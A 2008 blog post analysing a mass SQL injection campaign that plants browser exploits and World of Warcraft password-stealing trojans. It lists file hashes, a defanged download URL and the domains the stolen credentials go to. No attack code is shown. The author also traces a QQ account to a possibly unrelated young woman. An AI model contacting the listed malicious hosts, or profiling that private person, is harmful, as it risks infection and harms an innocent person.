Nov 10 2008
So the Analyt’s Diary blog at viruslist.com has an article on some new mass SQL injection attack that jacks up .asp pages with redirects to browser exploits. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:
WordPress won’t display the script. Basically, it loads an iframe that points to two separate URLS (these URLs contain browser exploits so don’t follow them):
I can’t seem to get to either of these sites at the moment. I’ll try again later.
Update: I spent some time looking at this malware. The two pages listed earlier in this post contain iframes to browser plug-in exploits for real player and other typical vulnerabilities. The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746 not packed/delphi code) which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be not packed/VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850 ) and cool.exe (18867d6de1a3a9241c14c22c19b51351 not packed/delphi).
1.exe is a WoW trojan and waits for passwords sent to:
grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com. It also looks for and attempts to disable many types of security software. It attempts to send the stolen credentials to an asp on www.yilu777.com.
do.exe is a little more interesting. It appears to be a generic remote access trojan that sends a beacon to qq number 58836533. A quick search for that qq number revealed that this person’s paipai account has been frozen:
So I do some more digging and find the QQ profile with a name and nick:
Searching for the nickname got me to a few blogs and profiles that had some young girl who is really into anime. Maybe her QQ account got pwn3d or maybe, just maybe she is a member of “China Girl Security”. I tried to get an add on that QQ account so I could talk to the hacker but didn’t have any luck.
Note to Chinese hackers: Please pay the tax on your WoW gold profits.
One Response to “Chinese hackers will do anything for your WoW password (updated)”